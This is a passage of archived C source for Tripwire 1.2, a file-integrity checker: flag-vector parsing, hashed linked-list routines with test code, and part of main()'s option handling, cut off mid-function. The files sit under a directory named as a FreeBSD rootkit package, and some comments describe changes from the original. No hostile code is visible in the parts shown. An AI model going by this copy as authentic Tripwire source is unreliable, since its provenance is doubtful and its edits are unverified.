fbsdrootkit-1.2/tripwire-1.2/src/ignorevec.c100600 764 764 7154 5611466420 16225 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: ignorevec.c,v 1.13 1994/07/15 11:03:44 gkim Exp $"; #endif /* * ignorevec.c * * ignore-flag vector handling routines * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #endif #ifdef STRINGH #include #else #include #endif #include #ifdef __STDC__ /* pick up all the structure prototypes */ #include #include #endif #include "../include/list.h" #include "../include/tripwire.h" /* * ignore_vec_to_scalar(char *s) * * take an ignore vector, and return an integer composed of OR'ed * ignore flags. */ int ignore_vec_to_scalar (s) char *s; { register int retval = 0; retval = (int) b64tol (s); SPDEBUG (10) printf ("ignore_vec_to_scalar (%s) --> %x\n", s, retval); return retval; } /* * ignore_configvec_to_dvec(char *s) * * convert a configuration-style ignore vector to the format we use in * database files. */ #define MASKIT(mask) if (ignorethis) {ignoremask |= (mask);} \ else {ignoremask = ignoremask & (~mask);} void ignore_configvec_to_dvec (s) char *s; { char dvec[128]; int ignoremask = 0, ignorethis = 0; char *pc; uint32 l; /* * where ignore-flags are in the format: * * [ [N|R|L] [ [-|+][p|i|n|u|g|s|a|m|c|0|1|2|3|4|5|6|7|8|9] ] ] * (template) (modifier) * * Templates: (default) N : Nothing (+pinusgsamc0123456789) * R : Read-only (N-a) * L : Log (N-samc0123456789) * E : Everything (-pnugsamci0123456789) */ /* walk through the ignore vector */ for (pc = s; *pc; pc++) { /* look for template */ switch (*pc) { case 'E': ignoremask = IGNORE_P | IGNORE_N | IGNORE_U | IGNORE_G | IGNORE_S | IGNORE_A | IGNORE_M | IGNORE_C | IGNORE_I | IGNORE_0_9; break; case 'L': ignoremask = IGNORE_S | IGNORE_A | IGNORE_M | IGNORE_C | IGNORE_0_9; break; case 'N': ignoremask = 0; break; case 'R': ignoremask = IGNORE_A | IGNORE_3 | IGNORE_4 | IGNORE_5 | IGNORE_6 | IGNORE_7 | IGNORE_8 | IGNORE_9; break; case '>': ignoremask 
= IGNORE_S | IGNORE_A | IGNORE_M | IGNORE_C | IGNORE_0_9 | IGNORE_GROW; break; default: goto NEXTPLACE; } } NEXTPLACE: for (; *pc; pc++) { switch (*pc) { case '+': ignorethis = 0; break; case '-': ignorethis = 1; break; case 'p': MASKIT (IGNORE_P); break; case 'i': MASKIT (IGNORE_I); break; case 'n': MASKIT (IGNORE_N); break; case 'u': MASKIT (IGNORE_U); break; case 'g': MASKIT (IGNORE_G); break; case 's': MASKIT (IGNORE_S); break; case 'a': MASKIT (IGNORE_A); break; case 'm': MASKIT (IGNORE_M); break; case 'c': MASKIT (IGNORE_C); break; case '0': MASKIT (IGNORE_0); break; case '1': MASKIT (IGNORE_1); break; case '2': MASKIT (IGNORE_2); break; case '3': MASKIT (IGNORE_3); break; case '4': MASKIT (IGNORE_4); break; case '5': MASKIT (IGNORE_5); break; case '6': MASKIT (IGNORE_6); break; case '7': MASKIT (IGNORE_7); break; case '8': MASKIT (IGNORE_8); break; case '9': MASKIT (IGNORE_9); break; default: fprintf (stderr, "%s: configuration parse error: illegal flag ('%c' in '%s')\n", progname, *pc, s); exit (1); } } /* now turn it into a string that we can interpolate */ l = ignoremask; (void) pltob64 (&l, (char *) dvec, 1); SPDEBUG (10) printf ("ignore_configvec_to_dvec: (%s) --> (%s)\n", s, dvec); (void) strcpy (s, dvec); return; } fbsdrootkit-1.2/tripwire-1.2/src/list.c100600 764 764 41020 5612102721 15215 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: list.c,v 1.14 1994/07/17 01:13:53 gkim Exp $"; #endif /* * list.c * * generic linked list routines. * * These routines generally use a (struct list **) as an argument * (ie: a pointer to a pointer to the head of the list). This way, * a NULL list pointer will automatically be malloc()'d into existence. * * These routines started as extremely simple routines. Unfortunately, the * O(n) search times made Tripwire extremely slow. So, v3.1 of * the linked list routines incorporate a hash table into each of * the list structures. *whew* It's faster, but it's not simple * anymore. 
(The addition of back pointers didn't help either...) * * Why? Well, we need to preserve order for the list of generated files. * So, a hash table won't do, and a simple linked list is too slow. * * Gene Kim * Purdue University * * March 1994 - Reworked to fix various bugs. * Paul Hilchey, UBC, hilchey@ucs.ubc.ca * ********** testing schedule ************ * * hashtable size = 1 * num records = 500 OK * * hashtable size = 1 * num records = 2000 OK * * hashtable size = 6007 * num records = 50 OK * * hashtable size = 6007 * num records = 3000 OK * * hashtable size = 6007 * num records = 8000 OK * * hashtable size = 6007 * num records = 20000 * * ghk -- 03/20/94 */ #include "../include/config.h" #include #ifdef STDLIBH #include #endif #include #ifdef MALLOCH # include #endif #ifdef STRINGH #include #else #include #endif #include "../include/list.h" /* prototypes */ static unsigned int string_hash (); static int listdebug = 0; #define LISTDEBUG(x) if (listdebug >= (x)) /* * list_set(pc_name, pc_value, priority, pp_list) * * insert structure with (name=pc_name) and (value=pc_value) * into the specified list */ void list_set(pc_name, pc_value, priority, pp_list) int priority; char *pc_name, *pc_value; struct list **pp_list; { struct list_elem *p, *sp, **q, **chain; int i, foundit; int namesize, valuesize; char *saved_pcname = NULL; /* were we handed a NULL list pointer? */ if (*pp_list == NULL) { /* malloc hash table */ if (NULL == (*pp_list = (struct list *)malloc(sizeof(struct list)))) { fprintf(stderr, "list_insert(): malloc() failed!\n"); exit(1); } /* initialize it */ for (i=0; ihashtable[i] = (struct list_elem *)NULL; (*pp_list)->p_head = (*pp_list)->p_tail = (*pp_list)->p_curr = (struct list_elem *)NULL; } /* chain points to the pointer to the first element in the chain */ chain = &( ((*pp_list)->hashtable)[string_hash(pc_name)] ); /* * 1) if pc_name is already in the list, then we compare priority * levels. 
replace only if new priority is higher than * existing priority. * * 2) if pc_name is not on the list, then we just add it to the * end of the list */ namesize = strlen(pc_name) + 1; /* +1 for the terminating \0 */ valuesize = strlen(pc_value) + 1; foundit = 0; /* walk through hash chain: p -> current element, q -> the link pointing to p */ for (p = *chain, q = chain; p; q = &(p->cnext), p = p->cnext) { if (strcmp(p->varname, pc_name) == 0) { /* * if existing priority is equal or less than this one, * then go ahead and clobber it. */ LISTDEBUG(10) fprintf(stderr, "list_set(): '%s' variable already found..\n", pc_name); if (p->priority <= priority) { LISTDEBUG(10) fprintf(stderr, "list_set(): Clobbering...\n"); foundit = 1; break; } /* existing priority is higher so do nothing */ return; } } if (foundit) { /* p -> found node; q points to pointer to p */ /* reallocate it and update links as needed */ sp = p; /* bad things happen if (pc_name) is freed by realloc(). so, we * detect this situation, and save a copy. 
*/ if (pc_name == (char *)p + sizeof(struct list_elem)) { if (!(saved_pcname = malloc(namesize))) { fprintf(stderr, "list_insert(): malloc() failed!\n"); exit(1); } strcpy(saved_pcname, pc_name); } p = (struct list_elem *) realloc(p, sizeof(struct list_elem) + namesize + valuesize); if (p == NULL) { fprintf(stderr, "list_insert(): realloc() failed!\n"); exit(1); } /* update pointers only if it moved */ if (sp != p) { if (p->next) p->next->prev = p; if (p->prev) p->prev->next = p; (*q) = p; if (sp == (*pp_list)->p_tail) (*pp_list)->p_tail = p; if (sp == (*pp_list)->p_head) (*pp_list)->p_head = p; if (sp == (*pp_list)->p_curr) (*pp_list)->p_curr = p; } } else { /* create new element */ if ((p = (struct list_elem *) malloc(sizeof(struct list_elem) + namesize + valuesize)) == NULL) { fprintf(stderr, "list_insert(): malloc() failed!\n"); exit(1); } /* link it onto list and hash chain */ p->next = NULL; p->prev = (*pp_list)->p_tail; if (p->prev) p->prev->next = p; else (*pp_list)->p_head = p; (*pp_list)->p_tail = p; p->cnext = *chain; *chain = p; } /* fill in data fields */ p->varname = (char *)p + sizeof(struct list_elem); if (!saved_pcname) (void) strcpy(p->varname, pc_name); else { (void) strcpy(p->varname, saved_pcname); free(saved_pcname); } if (!foundit) { p->flag = 0; p->priority = priority; } p->varvalue = p->varname + namesize; (void) strcpy(p->varvalue, pc_value); return; } /* * char * * list_lookup(pc_name, pp_list) * * return the string value assigned to the environment value named * pc_name in the specified list. * * you must copy the contents of the (char *). 
*/ char * list_lookup(pc_name, pp_list) char *pc_name; struct list **pp_list; { struct list_elem *p, **q; char *s; /* * 1) if *pp_list is NULL, then we know it's emtpy * 2) if it's not in the hash table, then return NULL * 3) search hash table chain */ /* check for empty list */ if (*pp_list == NULL) { return NULL; } q = &( ((*pp_list)->hashtable)[string_hash(pc_name)] ); /* now search through hash chain */ for (p = *q; p; p = p->cnext) { if (strcmp(p->varname, pc_name) == 0) { s = p->varvalue; return s; } } return NULL; } /* * int * list_isthere(pc_name, pp_list) * * returns (1) if pc_name is in the specified list. * else returns (0). */ int list_isthere(pc_name, pp_list) char *pc_name; struct list **pp_list; { struct list_elem *p, **q; /* * 1) if *pp_list is NULL, then we know it's emtpy * 3) search hash table chain */ /* check for empty list */ if (*pp_list == NULL) { return 0; } q = &( ((*pp_list)->hashtable)[string_hash(pc_name)] ); /* now search through hash chain */ for (p = *q; p; p = p->cnext) { if (strcmp(p->varname, pc_name) == 0) { return 1; } } return 0; } /* * list_unset(pc_name, pp_list) * remove the list entry with (varname == pcname) from the * environment */ void list_unset(pc_name, pp_list) char *pc_name; struct list **pp_list; { struct list_elem *p, **q; if (*pp_list == NULL) return; /* * 1) if pc_name isn't found in the hash chain, return * 2) if found, remove the element from the list, and then remove * from hash chain. */ /* look in hash table */ q = &(((*pp_list)->hashtable)[string_hash(pc_name)]); /* find the element, but playing pointer tag w/two pointers */ for (p = *q; p; q = &(p->cnext), p = p->cnext) { if (strcmp(p->varname, pc_name) == 0) { /* remove the element from the list */ /* are we at the head of the list? */ if (p->prev) p->prev->next = p->next; else (*pp_list)->p_head = p->next; /* are we at the end of the list? */ if (p->next) p->next->prev = p->prev; else (*pp_list)->p_tail = p->prev; /* are we the current item? 
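*/ if (p == (*pp_list)->p_curr) (*pp_list)->p_curr = p->next; /* now remove from hash chain */ *q = p->cnext; free((char *) p); return; } } }

/*
 * list_setflag(pc_name, flag, pp_list)
 *
 *	OR the specified flag into the existing flag value of the entry
 *	named pc_name.
 *
 *	Returns 0 when the entry was found and updated, -1 when the list
 *	is empty (*pp_list == NULL) or holds no entry with that name.
 */

int
list_setflag(pc_name, flag, pp_list)
    char *pc_name;
    int flag;
    struct list **pp_list;
{
    struct list_elem *p;

    if (*pp_list == NULL)
        return -1;

    /* only the chain selected by string_hash() can hold pc_name */
    for (p = (*pp_list)->hashtable[string_hash(pc_name)]; p; p = p->cnext) {
        if (strcmp(p->varname, pc_name) == 0) {
            p->flag |= flag;
            return 0;
        }
    }

    /*
     * not found: report it.  The old code fell through to "return 0",
     * so a caller could not tell a flagged entry from a missing one,
     * although the routine's own notes (and list_getflag) treat a
     * missing entry as an error.
     */
    return -1;
}

/*
 * list_getflag(pc_name, pp_list)
 *
 *	return the flag value stored in the entry named pc_name.
 *
 *	Returns -1 when the list is empty or the name is not present.
 *	Callers must compare the result against -1 before masking bits
 *	out of it: -1 has every bit set, so "list_getflag(...) & FLAG_X"
 *	is non-zero for a missing entry.
 */

int
list_getflag(pc_name, pp_list)
    char *pc_name;
    struct list **pp_list;
{
    struct list_elem *p;

    if (*pp_list == NULL)
        return -1;

    /* walk down the hash chain until the entry is found */
    for (p = (*pp_list)->hashtable[string_hash(pc_name)]; p; p = p->cnext) {
        if (strcmp(p->varname, pc_name) == 0)
            return p->flag;
    }

    return -1;
}

/*
 * list_print()
 *
 *	print out the entire contents of the linked list on stdout, one
 *	"(varname) varvalue flag" line per element, in p_head/next order.
 */

void
list_print(pp_list)
    struct list **pp_list;
{
    struct list_elem *p;

    /* an empty list prints nothing */
    if (*pp_list == NULL)
        return;

    for (p = (*pp_list)->p_head; p; p = p->next) {
        printf("(%s) %20s %d\n", p->varname, p->varvalue, p->flag);
    }
}

/*
 * list_reset()
 *
 *	given a pointer to a list, delete the entire list, and set the
 *	pointer to NULL.
 *
 *	NOTE(review): only the element structures and the list header are
 *	freed here.  Whether varname/varvalue need a free() of their own
 *	depends on how list_set() allocates them, which is not visible in
 *	this part of the file -- confirm.
 */

void
list_reset (pp_list)
    struct list **pp_list;
{
    struct list_elem *p, *q;

    if (*pp_list == NULL)
        return;

    /* step to the next element before freeing the one we came from */
    p = (*pp_list)->p_head;
    while (p) {
        q = p;
        p = p->next;
        free((char *) q);
    }

    /* now free up the list structure */
    free((char *) *pp_list);

    /* now invalidate the list structure pointer */
    *pp_list = NULL;
}

/*
 * list_init ()
 * list_open (struct list **pp_list)
 * list_get  (struct list **pp_list)
 * list_close(struct list **pp_list)
 *
 *	this allows the retrieval of individual list elements through
 *	successive calls to list_get().
 *
 *	0) list_init() no-op
 *	1) list_open() sets the current pointer to the first element
 *	2) any calls to list_get() will get the next element.
 *	3) list_close() clears current pointer
 *
 *	The cursor (p_curr) lives in the list header, so there is one
 *	cursor per list.
 */

int
list_init()
{
    return 0;
}

/*
 * list_open(struct list **pp_list)
 *
 *	reset current pointer to start of list.  Always returns 0; a NULL
 *	list is accepted and simply yields nothing from list_get().
 */

int
list_open (pp_list)
    struct list **pp_list;
{
    if (*pp_list != NULL) {
        (*pp_list)->p_curr = (*pp_list)->p_head;
    }
    return 0;
}

/*
 * struct list_elem *
 * list_get(struct list **pp_list)
 *
 *	get the next entry in the specified list (using *pp_list as the key),
 *	and bump the internal pointer to the next element, ready
 *	for the next call to list_get().
 *	we return NULL if we're sitting on the tail end of the list,
 *	or if the list itself is NULL.
 */

struct list_elem *
list_get (pp_list)
    struct list **pp_list;
{
    struct list_elem *p;

    if (*pp_list == NULL)
        return NULL;

    p = (*pp_list)->p_curr;
    if (p)
        (*pp_list)->p_curr = p->next;
    return (p);
}

/*
 * list_close(struct list **pp_list)
 *
 *	clear the current pointer.  Always returns 0.
 */

int
list_close (pp_list)
    struct list **pp_list;
{
    if (*pp_list != NULL) {
        (*pp_list)->p_curr = NULL;
    }
    return 0;
}

/*
 * string_hash(string)
 *
 *	fold the bytes of string into a bucket index.  Every pass through
 *	the loop ends with "% LIST_HASHSZ", and the empty string yields 0
 *	(the value of its terminating NUL), so the result is a valid
 *	hashtable index provided LIST_HASHSZ is greater than zero.
 */

static unsigned int
string_hash (string)
    char *string;
{
    unsigned int hindex;
    char *pc = string;

    hindex = *pc;
    while (*pc) {
        hindex = ((hindex << 9) ^ *pc++) % LIST_HASHSZ;
    }
    return hindex;
}

#ifdef TEST main() { char s[1024]; struct list *list = (struct list *) NULL; FILE *fpin; struct list_elem *p; int i, count, total[11]; #define X1 #ifdef X1 if (!(fpin = fopen("/tmp/x", "r"))) { perror("fopen()"); exit(1); } while (fgets(s, 1024, fpin) != 0) { s[strlen(s)-1] = 0; list_set(s, "", 0, &list); if (!list_lookup("/scr/genek/mush/expr.c", &list)) { printf("Yikes! (%s)\n", s); } } fseek(fpin, 0, 0); while (fgets(s, 1024, fpin) != 0) { s[strlen(s)-1] = 0; list_set(s, "x", 0, &list); if (!list_lookup("/scr/genek/mush/expr.c", &list)) { printf("Yikes! (%s)\n", s); } } fseek(fpin, 0, 0); while (fgets(s, 1024, fpin) != 0) { s[strlen(s)-1] = 0; if (!list_lookup(s, &list)) { printf("Yikes! 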
(%s)\n", s); } } for (i=0; ihashtable[i]; p; p=p->cnext) count++; if (count > 10) count = 10; total[count]++; } printf("\n\nlen number\n"); for (i=0; i<=10; i++) printf("%3d %6d\n", i, total[i]); #endif } #endif #ifdef TEST2 main() { struct list *l = NULL; list_set("a", "A", 1, &l); list_set("b", "B", 2, &l); list_set("c", "C", 3, &l); list_set("d", "d", 4, &l); list_set("e", "E", 5, &l); list_print(&l); list_set("d", "D", 5, &l); list_set("c", "c", 2, &l); list_setflag("b", 42, &l); list_print(&l); list_unset("a", &l); list_print(&l); list_unset("b", &l); list_print(&l); list_unset("d", &l); list_print(&l); } #endif /* TEST2 */ #ifdef TEST2 main() { struct list *l = NULL; list_set("a", "", 0, &l); list_set("b", "", 0, &l); list_set("c", "", 0, &l); list_set("d", "", 0, &l); list_set("e", "", 0, &l); list_print(&l); list_unset("a", &l); list_print(&l); list_unset("b", &l); list_print(&l); list_unset("d", &l); list_print(&l); } #endif /* TEST2 */ #ifdef TEST1a #define HSZ 50 list_debug_dump(pl) list *pl; { struct list_elem *ph, *qh; static int table[HSZ]; int i; int count = 0; for (i = 0; i < LIST_HASHSZ; i++) { ph = pl->hashtable[i]; /* skip useless entries */ if (!ph) continue; for (qh = ph; qh; qh = qh->cnext) { int tmp; sscanf(qh->varname, "%d", &tmp); table[tmp] = 1; count++; } } printf("count=%d (expecting %d)\n", count, HSZ); for (i = 0; i < HSZ; i++) { if (!table[i]) printf("we lost bucket %d\n", i); } } main() { static int isset[HSZ]; int i, j; struct list *l = NULL; char name[1024]; char *string = "x"; int numleft; /* set all values */ printf("--> set list\n"); for (i = 0; i < HSZ; i++) { sprintf(name, "%d", i); list_set(name, string, 0, &l); isset[i] = 1; } /* check for fully connected hash table */ printf("checking for connections...\n"); list_debug_dump(l); /* elim one at a time, and check to see that it's gone */ printf("--> eliminating\n"); numleft = HSZ; while (numleft > 0) { int which = rand() % HSZ; if (!isset[which]) continue; sprintf(name, "%d", 
which); list_set(name, "", 14, &l); list_setflag(name, 1, &l); list_unset(name, &l); isset[which] = 0; numleft--; #if HSZ < 50 /* confirm order */ printf("--> confirming order\n"); list_open(&l); { int pi; for (pi = 0; !isset[pi]; pi++) ; for (i = 0; i < numleft; i++) { struct list_elem *pl; char t[1024]; pl = list_get(&l); sprintf(t, "%d", pi); if (strcmp(t, pl->varname)) { printf("ordering fuck up! pi=%d, list=%s\n", pi, pl->varname); exit(1); } /* find next existing entry */ for (pi++; !isset[pi]; pi++) ; } } list_close(&l); #endif /* skip if we're not close to failure case */ /* if (numleft > 14005) continue; */ for (j = 0; j < HSZ; j++) { sprintf(name, "%d", j); if (!isset[j]) { if(list_isthere(name, &l)) { printf("fuck up -- list existing: j=%d\n", j); exit(1); } } else { #if HSZ < 3000 if(!list_isthere(name, &l)) { printf("fuck up -- list not existing: j=%d\n", j); exit(1); } #else ; #endif } } if (numleft % 10 == 0) printf("numleft = %d\n", numleft); } printf("** SUCCESS **\n"); exit(0); } #endif fbsdrootkit-1.2/tripwire-1.2/src/main.c100600 764 764 43221 5627323147 15210 0ustar dfdf#ifndef lint static char rcsid[] = "$Id: main.c,v 1.31 1994/08/26 08:23:03 gkim Exp $"; #endif /************************************************************************ * * All files in the distribution of Tripwire are Copyright 1992, 1993 by * the Purdue Research Foundation of Purdue University. All rights * reserved. Some individual files in this distribution may be covered * by other copyrights, as noted in their embedded comments. * * Redistribution and use in source and binary forms are permitted * provided that this entire copyright notice is duplicated in all such * copies, and that any documentation, announcements, and other * materials related to such distribution and use acknowledge that the * software was developed at Purdue University, W. Lafayette, IN by * Gene Kim and Eugene Spafford. 
No charge, other than an "at-cost" * distribution fee, may be charged for copies, derivations, or * distributions of this material without the express written consent * of the copyright holder. Neither the name of the University nor the * names of the authors may be used to endorse or promote products * derived from this material without specific prior written * permission. THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE * IMPLIED WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR ANY PARTICULAR * PURPOSE. * ************************************************************************/ /* * main.c * * main routines and global variables * * Gene Kim * Purdue University */ #include "../include/config.h" #include #ifdef STDLIBH #include #include #endif #include #include #include #include #ifdef STRINGH #include #else #include #endif #ifdef MALLOCH # include #endif #include #if (defined(SYSV) && (SYSV < 3)) # include #endif /* SVR2 */ #include "../include/list.h" #include "../include/tripwire.h" #include "../include/patchlevel.h" #ifndef L_tmpnam # define L_tmpnam (unsigned int) MAXPATHLEN #endif /* version information */ char *version_num = VERSION_NUM; int db_version_num = DB_VERSION_NUM; /******* signature functions ***************************************** * sig_md5_get : MD5 by RSA * sig_snefru_get : Snefru by Xerox * sig_null_get : null *********************************************************************/ int (*pf_signatures [NUM_SIGS]) () = { SIG0FUNC, SIG1FUNC, SIG2FUNC, SIG3FUNC, SIG4FUNC, SIG5FUNC, SIG6FUNC, SIG7FUNC, SIG8FUNC, SIG9FUNC }; char *signames[NUM_SIGS] = { SIG0NAME, SIG1NAME, SIG2NAME, SIG3NAME, SIG4NAME, SIG5NAME, SIG6NAME, SIG7NAME, SIG8NAME, SIG9NAME }; char *config_file = CONFIG_FILE; char *database_file = DATABASE_FILE; char *database_path = DATABASE_PATH; char *config_path = CONFIG_PATH; char tempdatabase_file[MAXPATHLEN+256]; FILE *fptempdbase; char *defaultignore = 
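DEFAULTIGNORE;
static char *defaultignore_parsed;	/* set in main() to the converted mask */

char *db_record_format = DB_RECORD_FORMAT;

struct list *olddbase_list = (struct list *) NULL;

int debuglevel = 1;
int verbosity = 0;
int loosedir = 0;
static int dbaseinit = 0;
int printhex = 0;
static char **pp_updateentries = NULL;
static int numupdateentries = 0;
int quietmode = 0;
int printpreprocess = 0;
char *specified_dbasefile = NULL;
char *specified_configfile = NULL;
int specified_configfd = -1;
int specified_dbasefd = -1;
/* if these vars are non-zero, specified_fd is guaranteed to be valid */
int specified_dbasemode = 0;
int specified_configmode = 0;
int runtimeignore = 0;
int interactivemode = 0;
int test_interactive = 0;

char *progname;

void cleanup();

/*
 * void
 * usage()
 *
 *	print the option summary on stderr and exit with status 1.
 */

static void
usage()
{
    static char *lines[] = {
        "usage: tripwire [ options ... ]\n",
        "\tWhere `options' are:\n",
        "\t\t-initialize Database Generation mode\n",
        "\t\t-init \n",
        "\t\t-update entry update entry (a file, directory, or \n",
        "\t\t tw.config entry) in the database\n",
        "\t\t-interactive Integrity Checking mode with\n",
        "\t\t Interactive entry updating\n",
        "\t\t-loosedir use looser checking rules for directories\n",
        "\t\t-d dbasefile read in database from dbasefile\n",
        "\t\t (use `-d -' to read from stdin)\n",
        "\t\t-c configfile read in config file from configfile\n",
        "\t\t (use `-c -' to read from stdin)\n",
        "\t\t-cfd fd read in config file from specified fd\n",
        "\t\t-dfd fd read in the database file from specified fd\n",
        "\t\t-Dvar=value define a tw.config variable (ala @@define)\n",
        "\t\t-Uvar undefine a tw.config variable (ala @@undef)\n",
        "\t\t-i #|all ignore the specified signature (to reduce\n",
        "\t\t execution time)\n",
        "\t\t-q quiet mode\n",
        "\t\t-v verbose mode\n",
        "\t\t-preprocess print out preprocessed configuration file\n",
        "\t\t-E \n",
        "\t\t-help print out interpretation help message\n",
        "\t\t-version print version and patch information\n",
        NULL
    };
    char **pp;

    for (pp = lines; *pp; pp++)
        fputs(*pp, stderr);
    exit(1);
}

/*
 * void
 * version()
 *
 *	print out version information, with patchlevel information,
 *	on stderr and exit with status 0.
 *	currently, there is no real correlation between the two.
 */

static void
version()
{
    fprintf(stderr, "\nTripwire version %s (patchlevel %d)\n\n", version_num, PATCHLEVEL);
    fprintf(stderr, "Copyright (c) 1992, 1993, 1994 Purdue Research Foundation\n");
    fprintf(stderr, "\tBy Gene Kim, Eugene Spafford\n\n");
    exit(0);
}

/*
 * int
 * main(argc, argv)
 *
 *	parse the command line, reject contradictory option combinations,
 *	then run one of the modes: database generation (-initialize),
 *	database update (-update), or integrity checking, optionally
 *	followed by an interactive update (-interactive).
 *
 *	Never returns; every path ends in exit().  In integrity checking
 *	mode the exit status is a bit mask: 2 = files added, 4 = files
 *	deleted, 8 = set when diff_unignored_num is non-zero.
 *
 *	Changes against the original, all in the handling of
 *	operator-supplied strings and numbers:
 *	  - "-i N" rejects N outside 0..NUM_SIGS-1 instead of shifting
 *	    IGNORE_0 by an arbitrary amount (undefined for negative or
 *	    oversized counts, and able to set unrelated bits);
 *	  - "-cfd"/"-dfd" require sscanf() to convert exactly one field
 *	    (an EOF return used to pass the "!sscanf()" test);
 *	  - "-D" arguments, the default ignore mask and the database path
 *	    are length-checked before being copied into fixed buffers;
 *	  - errno reports that embed progname or a path no longer go
 *	    through a fixed-size sprintf() buffer.
 */

int
main(argc, argv)
    int argc;
    char *argv[];
{
    int i, fd;
    char *pc;
    char database[MAXPATHLEN+256];
    char mask[64];
    char *specified_fd;
    int exitstatus = 0;
    int saved_errno;

    progname = argv[0];
    database[0] = '\0';

    /* iterate through arguments */
    for (i = 1; i < argc; i++) {
        pc = argv[i];

        /* verbose mode */
        if (strcmp(pc, "-v") == 0) {
            verbosity++;
            continue;
        }
        /* quiet mode */
        if (strcmp(pc, "-q") == 0) {
            quietmode++;
            continue;
        }
        /* hex mode */
        if (strcmp(pc, "-x") == 0) {
            printhex++;
            continue;
        }
        /* database generation mode */
        if (strcmp(pc, "-initialize") == 0 || strcmp(pc, "-init") == 0 ||
            strcmp(pc, "-initialise") == 0) {
            dbaseinit++;
            continue;
        }
        /* print preprocessed configuration file */
        if ((strcmp(pc, "-preprocess") == 0) || (strcmp(pc, "-E") == 0)) {
            printpreprocess++;
            continue;
        }
        /* update specific database entry */
        if (strcmp(pc, "-update") == 0) {
            /* check to see that there is an argument */
            if ((pc = argv[++i]) == NULL) {
                usage();
            }
            /* exhaust the argument list: everything after -update is an entry */
            while (pc) {
                if (pp_updateentries == NULL) {
                    if ((pp_updateentries = (char **) malloc(sizeof(char *))) == NULL) {
                        die_with_err("main: malloc() failed!\n", NULL);
                    }
                }
                else if ((pp_updateentries = (char **) realloc(pp_updateentries,
                        (numupdateentries+1) * sizeof(char *))) == NULL) {
                    die_with_err("main: realloc() failed!\n", NULL);
                }
                pp_updateentries[numupdateentries++] = pc;
                pc = argv[++i];
            }
            continue;
        }
        /* specify database file */
        if (strcmp(pc, "-d") == 0) {
            /* check to see that there is an argument */
            if ((pc = argv[++i]) == NULL) {
                usage();
            }
            specified_dbasefile = pc;
            specified_dbasemode |= SPECIFIED_FILE;
            continue;
        }
        /* specify configuration file */
        if (strcmp(pc, "-c") == 0) {
            /* check to see that there is an argument */
            if ((pc = argv[++i]) == NULL) {
                usage();
            }
            specified_configfile = pc;
            specified_configmode |= SPECIFIED_FILE;
            continue;
        }
        /* specify configuration file descriptor */
        if (strcmp(pc, "-cfd") == 0) {
            char err[512];

            /* check to see that there is an argument */
            if ((pc = argv[++i]) == NULL) {
                usage();
            }
            specified_fd = pc;
            /* exactly one converted field; 0 and EOF are both failures */
            if (sscanf(specified_fd, "%d", &specified_configfd) != 1) {
                usage();
            }
            /* if we try to read stdin, we'll block, so skip read */
            if (specified_configfd != 0 &&
                fcntl(specified_configfd, F_GETFL, 0) < 0) {
                sprintf(err, "tripwire: Couldn't open fd %d! fcntl()", specified_configfd);
                perror(err);
                exit(1);
            }
            specified_configmode |= SPECIFIED_FD;
            continue;
        }
        /* specify dbase file descriptor */
        if (strcmp(pc, "-dfd") == 0) {
            char err[512];

            /* check to see that there is an argument */
            if ((pc = argv[++i]) == NULL) {
                usage();
            }
            specified_fd = pc;
            /* exactly one converted field; 0 and EOF are both failures */
            if (sscanf(specified_fd, "%d", &specified_dbasefd) != 1) {
                usage();
            }
            /* if we try to read stdin, we'll block, so skip read */
            if (specified_dbasefd != 0 &&
                fcntl(specified_dbasefd, F_GETFL, 0) < 0) {
                sprintf(err, "tripwire: Couldn't open fd %d! fcntl()", specified_dbasefd);
                perror(err);
                exit(1);
            }
            specified_dbasemode |= SPECIFIED_FD;
            continue;
        }
        /* ignore specified signatures */
        if (strcmp(pc, "-i") == 0) {
            int tmpflag;

            /* check to see if there is an argument */
            if ((pc = argv[++i]) == NULL) {
                usage();
            }
            if (strcmp(pc, "all") == 0) {
                runtimeignore = IGNORE_0_9;
                continue;
            }
            if ((sscanf(pc, "%d", &tmpflag)) != 1)
                usage();
            /* the shift count must name one of the NUM_SIGS signatures */
            if (tmpflag < 0 || tmpflag >= NUM_SIGS)
                usage();
            runtimeignore |= (IGNORE_0 << tmpflag);
            continue;
        }
        /* set the debug level */
        if (strcmp(pc, "-debug") == 0) {
            /* check to see if there is an argument */
            if ((pc = argv[++i]) == NULL) {
                usage();
            }
            if ((sscanf(pc, "%d", &debuglevel)) != 1)
                usage();
            continue;
        }
        /* print out version information */
        if (strcmp(pc, "-version") == 0) {
            version();
        }
        /* loosedir rules */
        if (strcmp(pc, "-loosedir") == 0) {
            loosedir = 1;
            continue;
        }
        /* print out the interpretation help message */
        if (strcmp(pc, "-help") == 0) {
            tw_help_print(stderr);
            exit(0);
        }
        /* interactive mode */
        if (strcmp(pc, "-interactive") == 0) {
            interactivemode++;
            continue;
        }
        /* define (-Dfoo=bar) */
        if (strncmp(pc, "-D", 2) == 0) {
            char key[512], value[512];

            if (!pc[2]) {
                fputs("tripwire: -D requires an argument!\n", stderr);
                exit(1);
            }
            /*
             * string_split_ch() is defined elsewhere and is handed no
             * buffer sizes; presumably each half it writes is no longer
             * than its input (TODO confirm), so bound the input by the
             * smaller of the two buffers.
             */
            if (strlen(pc+2) >= sizeof(key) || strlen(pc+2) >= sizeof(value)) {
                fputs("tripwire: -D argument is too long!\n", stderr);
                exit(1);
            }
            (void) string_split_ch(pc+2, key, value, '=');
            tw_mac_define(key, value);
            continue;
        }
        /* undef (-Ufoo) */
        if (strncmp(pc, "-U", 2) == 0) {
            if (!pc[2]) {
                fputs("tripwire: -U requires an argument!\n", stderr);
                exit(1);
            }
            tw_mac_undef(pc+2);
            continue;
        }
        /* undocumented: test interactive mode */
        if (strcmp(pc, "-interactivetest_yesimsure") == 0) {
            test_interactive = 1;
            continue;
        }

        /* anything else is an error */
        usage();
    }

    /* argument sanity checking */

    /* eliminate aliases of stdin
     *	(our canonical form is using fd 0)
     */
    if (specified_dbasefile && strcmp(specified_dbasefile, "-") == 0) {
        specified_dbasefd = 0;
        specified_dbasemode = SPECIFIED_FD;
        specified_dbasefile = NULL;
    }
    if (specified_configfile && strcmp(specified_configfile, "-") == 0) {
        specified_configfd = 0;
        specified_configmode = SPECIFIED_FD;
        specified_configfile = NULL;
    }

    /* are two files set to read from stdin? */
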